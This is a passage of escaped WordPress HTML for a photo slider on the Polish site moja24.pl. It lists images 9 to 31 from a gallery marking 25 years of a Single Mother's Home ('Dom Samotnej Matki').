                      <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-9.jpg\" title=\"25 lat Domu Samotnej Matki (9)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-9-279x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-9-279x420.jpg 279w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-9-199x300.jpg 199w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-9.jpg 638w\" sizes=\"(max-width: 279px) 100vw, 279px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item10\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-10.jpg\" title=\"25 lat Domu Samotnej Matki (10)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-10-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-10-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-10-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-10-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-10-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-10.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item11\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-11.jpg\" title=\"25 lat Domu Samotnej Matki (11)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-11-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-11-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-11-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-11-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-11-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-11.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item12\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-12.jpg\" title=\"25 lat Domu Samotnej Matki (12)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-12-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-12-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-12-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-12-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-12-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-12.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item13\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-13.jpg\" title=\"25 lat Domu Samotnej Matki (13)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-13-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-13-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-13-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-13-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-13-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-13.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item14\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-14.jpg\" title=\"25 lat Domu Samotnej Matki (14)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-14-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-14-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-14-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-14-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-14-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-14.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item15\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-15.jpg\" title=\"25 lat Domu Samotnej Matki (15)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-15-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-15-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-15-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-15-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-15-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-15.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item16\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-16.jpg\" title=\"25 lat Domu Samotnej Matki (16)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-16-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-16-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-16-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-16-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-16-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-16.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item17\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-17.jpg\" title=\"25 lat Domu Samotnej Matki (17)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-17-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-17-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-17-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-17-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-17-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-17.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item18\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-18.jpg\" title=\"25 lat Domu Samotnej Matki (18)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-18-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-18-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-18-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-18-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-18-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-18.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item19\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-19.jpg\" title=\"25 lat Domu Samotnej Matki (19)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-19-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-19-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-19-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-19-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-19-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-19.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item20\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-20.jpg\" title=\"25 lat Domu Samotnej Matki (20)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-20-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-20-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-20-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-20-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-20-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-20.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item21\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-21.jpg\" title=\"25 lat Domu Samotnej Matki (21)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-21-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-21-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-21-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-21-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-21-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-21.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item22\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-22.jpg\" title=\"25 lat Domu Samotnej Matki (22)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-22-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-22-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-22-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-22-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-22-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-22.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item23\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-23.jpg\" title=\"25 lat Domu Samotnej Matki (23)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-23-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-23-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-23-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-23-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-23-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-23.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item24\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-24.jpg\" title=\"25 lat Domu Samotnej Matki (24)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-24-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-24-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-24-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-24-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-24-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-24.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item25\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-25.jpg\" title=\"25 lat Domu Samotnej Matki (25)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-25-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-25-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-25-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-25-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-25-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-25.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item26\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-26.jpg\" title=\"25 lat Domu Samotnej Matki (26)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-26-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-26-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-26-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-26-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-26-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-26.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item27\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-27.jpg\" title=\"25 lat Domu Samotnej Matki (27)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-27-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-27-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-27-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-27-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-27-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-27.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item28\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-28.jpg\" title=\"25 lat Domu Samotnej Matki (28)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-28-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-28-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-28-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-28-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-28-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-28.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item29\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-29.jpg\" title=\"25 lat Domu Samotnej Matki (29)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-29-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-29-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-29-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-29-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-29-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-29.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item30\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-30.jpg\" title=\"25 lat Domu Samotnej Matki (30)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-30-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-30-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-30-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-30-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-30-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-30.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item31\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-31.jpg\" title=\"25 lat Domu Samotnej Matki (31)\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-31-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-31-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-31-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/09\/25-lat-Domu-Samotnej-Matki-31-768x510.jpg 768w, 